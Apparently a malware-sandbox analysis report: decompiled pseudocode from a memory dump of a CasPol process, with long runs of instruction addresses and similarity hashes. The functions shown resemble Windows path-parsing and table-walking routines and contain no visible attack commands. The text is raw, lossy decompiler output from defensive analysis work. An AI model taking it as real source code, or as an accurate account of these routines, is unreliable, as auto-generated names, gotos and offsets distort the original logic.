																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = L014C4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0144D130(_t427, _t494, _t511);
				}
			}










































































                                                                  0x014c5ba5
                                                                  0x014c5baa
                                                                  0x014c5baf
                                                                  0x014c5bb4
                                                                  0x014c5bb6
                                                                  0x014c5bbc
                                                                  0x014c5bbe
                                                                  0x014c5bc4
                                                                  0x014c5bcd
                                                                  0x014c5bd3
                                                                  0x014c5bd6
                                                                  0x014c5bdc
                                                                  0x014c5be0
                                                                  0x014c5be3
                                                                  0x014c5beb
                                                                  0x014c5bf2
                                                                  0x014c5bf8
                                                                  0x014c5bfe
                                                                  0x014c5c04
                                                                  0x014c5c0e
                                                                  0x014c5c18
                                                                  0x014c5c1f
                                                                  0x014c5c25
                                                                  0x014c5c2a
                                                                  0x014c5c2c
                                                                  0x014c5c32
                                                                  0x014c5c3a
                                                                  0x014c5c3f
                                                                  0x014c5c42
                                                                  0x014c5c48
                                                                  0x014c5c5b
                                                                  0x014c5c5b
                                                                  0x014c5c2c
                                                                  0x014c5cb7
                                                                  0x014c5cb9
                                                                  0x014c5cbf
                                                                  0x014c5cc2
                                                                  0x014c5cca
                                                                  0x014c5ccb
                                                                  0x014c5ccb
                                                                  0x014c5cd1
                                                                  0x014c5cd7
                                                                  0x014c5cda
                                                                  0x014c5ce1
                                                                  0x014c5ce4
                                                                  0x014c5ce7
                                                                  0x014c5ced
                                                                  0x014c5cf3
                                                                  0x014c5cf9
                                                                  0x014c5cff
                                                                  0x014c5d08
                                                                  0x014c5d0a
                                                                  0x014c5d0e
                                                                  0x014c5d10
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5d16
                                                                  0x014c5d1a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5d20
                                                                  0x014c5d22
                                                                  0x014c5d25
                                                                  0x014c5d2f
                                                                  0x014c5d2f
                                                                  0x014c5d33
                                                                  0x014c5d3d
                                                                  0x014c5d49
                                                                  0x014c5d4b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5d5a
                                                                  0x014c5d5d
                                                                  0x014c5d60
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5d66
                                                                  0x014c5d69
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5d6f
                                                                  0x014c5d6f
                                                                  0x014c5d73
                                                                  0x014c5d79
                                                                  0x014c5d7f
                                                                  0x014c5d86
                                                                  0x014c5d95
                                                                  0x014c5d98
                                                                  0x014c5dba
                                                                  0x014c5dcb
                                                                  0x014c5dce
                                                                  0x014c5dd3
                                                                  0x014c5dd6
                                                                  0x014c5dd8
                                                                  0x014c5de6
                                                                  0x014c5dec
                                                                  0x014c5dee
                                                                  0x014c5df1
                                                                  0x014c5df3
                                                                  0x014c635a
                                                                  0x014c635a
                                                                  0x00000000
                                                                  0x014c635a
                                                                  0x014c5dfe
                                                                  0x014c5e02
                                                                  0x014c5e05
                                                                  0x014c5e07
                                                                  0x014c5e10
                                                                  0x014c5e13
                                                                  0x014c5e1b
                                                                  0x014c5e1c
                                                                  0x014c5e21
                                                                  0x014c5e22
                                                                  0x014c5e23
                                                                  0x014c5e25
                                                                  0x014c5e2a
                                                                  0x014c5e2c
                                                                  0x014c5e2e
                                                                  0x014c5e36
                                                                  0x014c5e39
                                                                  0x014c5e42
                                                                  0x014c5e47
                                                                  0x014c5e4d
                                                                  0x014c5e54
                                                                  0x014c5e54
                                                                  0x014c5e54
                                                                  0x014c5e2e
                                                                  0x014c5e5c
                                                                  0x014c5e5f
                                                                  0x014c5e62
                                                                  0x014c5e64
                                                                  0x014c5e6b
                                                                  0x014c5e70
                                                                  0x014c5e7a
                                                                  0x014c5e7a
                                                                  0x014c5e7a
                                                                  0x014c5e6b
                                                                  0x014c5e7e
                                                                  0x014c5e7f
                                                                  0x014c5e7f
                                                                  0x014c5e81
                                                                  0x014c5e87
                                                                  0x014c5e8b
                                                                  0x014c5e8c
                                                                  0x014c5e8c
                                                                  0x014c5e8c
                                                                  0x014c5e9a
                                                                  0x014c5e9c
                                                                  0x014c5ea2
                                                                  0x014c5ea6
                                                                  0x014c5f50
                                                                  0x014c5f50
                                                                  0x014c5f57
                                                                  0x014c5f66
                                                                  0x014c5f66
                                                                  0x014c5f66
                                                                  0x014c5f68
                                                                  0x014c5f6a
                                                                  0x014c63d0
                                                                  0x00000000
                                                                  0x014c5f70
                                                                  0x014c5f70
                                                                  0x014c5f91
                                                                  0x014c5f9c
                                                                  0x014c5f9e
                                                                  0x014c5fa4
                                                                  0x014c5fa6
                                                                  0x014c638c
                                                                  0x014c6392
                                                                  0x014c63a1
                                                                  0x014c63a7
                                                                  0x014c63af
                                                                  0x014c63af
                                                                  0x014c63bd
                                                                  0x014c63d8
                                                                  0x00000000
                                                                  0x014c63d8
                                                                  0x014c5fac
                                                                  0x014c5fb2
                                                                  0x014c5fb4
                                                                  0x014c5fbd
                                                                  0x014c5fc6
                                                                  0x014c5fce
                                                                  0x014c5fd4
                                                                  0x014c5fdc
                                                                  0x014c5fec
                                                                  0x014c5fed
                                                                  0x014c5fee
                                                                  0x014c5fef
                                                                  0x014c5ff9
                                                                  0x014c5ffa
                                                                  0x014c5ffb
                                                                  0x014c5ffc
                                                                  0x014c6000
                                                                  0x014c6004
                                                                  0x014c6012
                                                                  0x014c6012
                                                                  0x014c6018
                                                                  0x014c6019
                                                                  0x014c601a
                                                                  0x014c601b
                                                                  0x014c601c
                                                                  0x014c6020
                                                                  0x014c6059
                                                                  0x014c605c
                                                                  0x014c6061
                                                                  0x014c6061
                                                                  0x014c6022
                                                                  0x014c6022
                                                                  0x014c6022
                                                                  0x014c6025
                                                                  0x014c602a
                                                                  0x014c602b
                                                                  0x014c6031
                                                                  0x014c6037
                                                                  0x014c6038
                                                                  0x014c603e
                                                                  0x014c6048
                                                                  0x014c6049
                                                                  0x014c604a
                                                                  0x014c604b
                                                                  0x014c604c
                                                                  0x014c604d
                                                                  0x014c6053
                                                                  0x014c6054
                                                                  0x014c6054
                                                                  0x014c6062
                                                                  0x014c6065
                                                                  0x014c6067
                                                                  0x014c606a
                                                                  0x014c6070
                                                                  0x014c6075
                                                                  0x014c6076
                                                                  0x014c6081
                                                                  0x014c6087
                                                                  0x014c6095
                                                                  0x014c6099
                                                                  0x014c609e
                                                                  0x014c60a4
                                                                  0x014c60ae
                                                                  0x014c60b0
                                                                  0x014c60b3
                                                                  0x014c60b6
                                                                  0x014c60b8
                                                                  0x014c60ba
                                                                  0x014c60ba
                                                                  0x014c60ba
                                                                  0x014c60ba
                                                                  0x014c60be
                                                                  0x014c60c0
                                                                  0x014c60c5
                                                                  0x014c60c5
                                                                  0x014c60c5
                                                                  0x014c60c6
                                                                  0x014c60cd
                                                                  0x014c6114
                                                                  0x014c60cf
                                                                  0x014c60cf
                                                                  0x014c60d4
                                                                  0x014c60d5
                                                                  0x014c60da
                                                                  0x014c60db
                                                                  0x014c60e1
                                                                  0x014c60e2
                                                                  0x014c60e8
                                                                  0x014c60f8
                                                                  0x014c60fd
                                                                  0x014c60fe
                                                                  0x014c6102
                                                                  0x014c6104
                                                                  0x014c6107
                                                                  0x014c6109
                                                                  0x014c610b
                                                                  0x014c610b
                                                                  0x014c610b
                                                                  0x014c610b
                                                                  0x014c610f
                                                                  0x014c610f
                                                                  0x014c6117
                                                                  0x014c611a
                                                                  0x014c611f
                                                                  0x014c6125
                                                                  0x014c6134
                                                                  0x014c6139
                                                                  0x014c613f
                                                                  0x014c6146
                                                                  0x014c6148
                                                                  0x014c614b
                                                                  0x014c614d
                                                                  0x014c614f
                                                                  0x014c614f
                                                                  0x014c614f
                                                                  0x014c614f
                                                                  0x014c6153
                                                                  0x014c6159
                                                                  0x014c6159
                                                                  0x014c615c
                                                                  0x014c6163
                                                                  0x014c6169
                                                                  0x014c616c
                                                                  0x014c6172
                                                                  0x014c6181
                                                                  0x014c6186
                                                                  0x014c6187
                                                                  0x014c618b
                                                                  0x014c6191
                                                                  0x014c6195
                                                                  0x014c61a3
                                                                  0x014c61bb
                                                                  0x014c61c0
                                                                  0x014c61c3
                                                                  0x014c61cc
                                                                  0x014c61d0
                                                                  0x014c61dc
                                                                  0x014c61de
                                                                  0x014c61e1
                                                                  0x014c61e4
                                                                  0x014c61e6
                                                                  0x014c61e8
                                                                  0x014c61e8
                                                                  0x014c61e8
                                                                  0x014c61e8
                                                                  0x014c61e6
                                                                  0x014c61ec
                                                                  0x014c61f3
                                                                  0x014c6203
                                                                  0x014c6209
                                                                  0x014c620a
                                                                  0x014c6216
                                                                  0x014c621d
                                                                  0x014c6227
                                                                  0x014c6241
                                                                  0x014c6246
                                                                  0x014c624c
                                                                  0x014c6257
                                                                  0x014c6259
                                                                  0x014c625c
                                                                  0x014c625e
                                                                  0x014c6260
                                                                  0x014c6260
                                                                  0x014c6260
                                                                  0x014c6260
                                                                  0x014c625e
                                                                  0x014c6264
                                                                  0x014c6267
                                                                  0x014c6269
                                                                  0x014c6315
                                                                  0x014c6315
                                                                  0x014c631b
                                                                  0x014c631e
                                                                  0x014c6324
                                                                  0x014c6327
                                                                  0x014c632f
                                                                  0x014c6330
                                                                  0x014c6333
                                                                  0x014c633a
                                                                  0x014c633c
                                                                  0x014c6335
                                                                  0x014c6335
                                                                  0x014c6335
                                                                  0x014c633f
                                                                  0x014c6342
                                                                  0x014c634c
                                                                  0x014c6352
                                                                  0x014c6355
                                                                  0x014c6355
                                                                  0x014c6359
                                                                  0x00000000
                                                                  0x014c626f
                                                                  0x014c6275
                                                                  0x014c6275
                                                                  0x014c6278
                                                                  0x014c627e
                                                                  0x014c627e
                                                                  0x014c6281
                                                                  0x014c6287
                                                                  0x014c628d
                                                                  0x014c6298
                                                                  0x014c629c
                                                                  0x014c62a2
                                                                  0x014c629e
                                                                  0x014c629e
                                                                  0x014c629e
                                                                  0x014c62a7
                                                                  0x014c62a7
                                                                  0x014c62aa
                                                                  0x014c62b0
                                                                  0x014c62f0
                                                                  0x014c62f0
                                                                  0x014c62f2
                                                                  0x014c62f8
                                                                  0x014c62fd
                                                                  0x014c62b2
                                                                  0x014c62b2
                                                                  0x014c62b2
                                                                  0x014c62b5
                                                                  0x014c62dd
                                                                  0x014c62e2
                                                                  0x014c62e5
                                                                  0x014c62b7
                                                                  0x014c62b8
                                                                  0x014c62bb
                                                                  0x014c62bd
                                                                  0x014c62c0
                                                                  0x014c62c4
                                                                  0x014c62cd
                                                                  0x014c62cd
                                                                  0x014c62c0
                                                                  0x014c62bb
                                                                  0x014c62b5
                                                                  0x014c6302
                                                                  0x014c6303
                                                                  0x014c6305
                                                                  0x014c6305
                                                                  0x014c6305
                                                                  0x014c630c
                                                                  0x014c630c
                                                                  0x00000000
                                                                  0x014c627e
                                                                  0x014c6269
                                                                  0x014c5eac
                                                                  0x014c5ebb
                                                                  0x014c5ebe
                                                                  0x014c5ecb
                                                                  0x014c5ecb
                                                                  0x014c5ece
                                                                  0x014c5ece
                                                                  0x014c5ed4
                                                                  0x014c5ed7
                                                                  0x014c5ed9
                                                                  0x014c5edb
                                                                  0x014c5edb
                                                                  0x014c5ee1
                                                                  0x014c5ee1
                                                                  0x014c5ee3
                                                                  0x014c5f20
                                                                  0x014c5f20
                                                                  0x014c5ee5
                                                                  0x014c5ee5
                                                                  0x014c5ee5
                                                                  0x014c5ee8
                                                                  0x014c5f11
                                                                  0x014c5f18
                                                                  0x014c5eea
                                                                  0x014c5eea
                                                                  0x014c5eed
                                                                  0x014c5ef2
                                                                  0x014c5ef8
                                                                  0x014c5efb
                                                                  0x014c5f0a
                                                                  0x014c5f0a
                                                                  0x014c5eed
                                                                  0x014c5ee8
                                                                  0x014c5f22
                                                                  0x014c5f28
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5f30
                                                                  0x014c5f31
                                                                  0x014c5f37
                                                                  0x014c5f3a
                                                                  0x014c5f3d
                                                                  0x014c5f44
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5f46
                                                                  0x014c5f48
                                                                  0x014c5f4d
                                                                  0x00000000
                                                                  0x014c5f4d
                                                                  0x014c5dda
                                                                  0x014c5ddf
                                                                  0x00000000
                                                                  0x014c5ddf
                                                                  0x014c5dd8
                                                                  0x014c5da7
                                                                  0x014c5da9
                                                                  0x014c5dac
                                                                  0x014c5dae
                                                                  0x00000000
                                                                  0x014c5db4
                                                                  0x014c5db4
                                                                  0x00000000
                                                                  0x014c5db4
                                                                  0x014c5dae
                                                                  0x014c5d88
                                                                  0x014c5d8d
                                                                  0x014c6363
                                                                  0x014c6369
                                                                  0x014c636a
                                                                  0x014c6370
                                                                  0x014c6372
                                                                  0x014c637a
                                                                  0x014c637b
                                                                  0x014c637d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c637f
                                                                  0x014c6385
                                                                  0x00000000
                                                                  0x014c6385
                                                                  0x014c5d38
                                                                  0x014c5d3b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c5d3b
                                                                  0x014c5d27
                                                                  0x014c5d29
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014c6360
                                                                  0x00000000
                                                                  0x014c6360
                                                                  0x014c5c10
                                                                  0x014c5c10
                                                                  0x014c63da
                                                                  0x014c63e5
                                                                  0x014c63e5

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 99aa2e774bfe46e2b393afb8b3c7b516f51b8631475b7f2c6373a26677f70265
                                                                  • Instruction ID: 0d0329cd9a7c14c4d263ccdf7864ef25b7fe4dc204f9acf68d5083307b35f56a
                                                                  • Opcode Fuzzy Hash: 99aa2e774bfe46e2b393afb8b3c7b516f51b8631475b7f2c6373a26677f70265
                                                                  • Instruction Fuzzy Hash: 46425E75A00219CFDB64CF68C840BAABBB1FF45704F1581AED94DAB362D734A985CF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01414120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 92%
                                                                  			E01414120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x14ed360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0142F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = L01416E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01414620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = L01416E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M014145F8))) {
												case 0:
													_v568 = 0x13d1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x13d11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01414620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															L0143F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															L0143F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E013F52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0140EB70(1, 0x14e79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0140AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E014395D0();
																			L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return L0143B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01433D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return L0143B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                  0x01414128
                                                                  0x01414135
                                                                  0x0141413c
                                                                  0x01414141
                                                                  0x01414145
                                                                  0x01414147
                                                                  0x0141414e
                                                                  0x01414151
                                                                  0x01414159
                                                                  0x0141415c
                                                                  0x01414160
                                                                  0x01414164
                                                                  0x01414168
                                                                  0x0141416c
                                                                  0x0141417f
                                                                  0x01414181
                                                                  0x0141446a
                                                                  0x0141446a
                                                                  0x0141418c
                                                                  0x01414195
                                                                  0x01414199
                                                                  0x01414432
                                                                  0x01414439
                                                                  0x0141443d
                                                                  0x01414442
                                                                  0x01414447
                                                                  0x00000000
                                                                  0x0141419f
                                                                  0x014141a3
                                                                  0x014141b1
                                                                  0x014141b9
                                                                  0x014141bd
                                                                  0x014145db
                                                                  0x014145db
                                                                  0x00000000
                                                                  0x014141c3
                                                                  0x014141c3
                                                                  0x014141ce
                                                                  0x014141d4
                                                                  0x0145e138
                                                                  0x0145e13e
                                                                  0x0145e169
                                                                  0x0145e16d
                                                                  0x0145e19e
                                                                  0x0145e16f
                                                                  0x0145e16f
                                                                  0x0145e175
                                                                  0x0145e179
                                                                  0x0145e18f
                                                                  0x0145e193
                                                                  0x00000000
                                                                  0x0145e199
                                                                  0x00000000
                                                                  0x0145e199
                                                                  0x0145e193
                                                                  0x00000000
                                                                  0x00000000
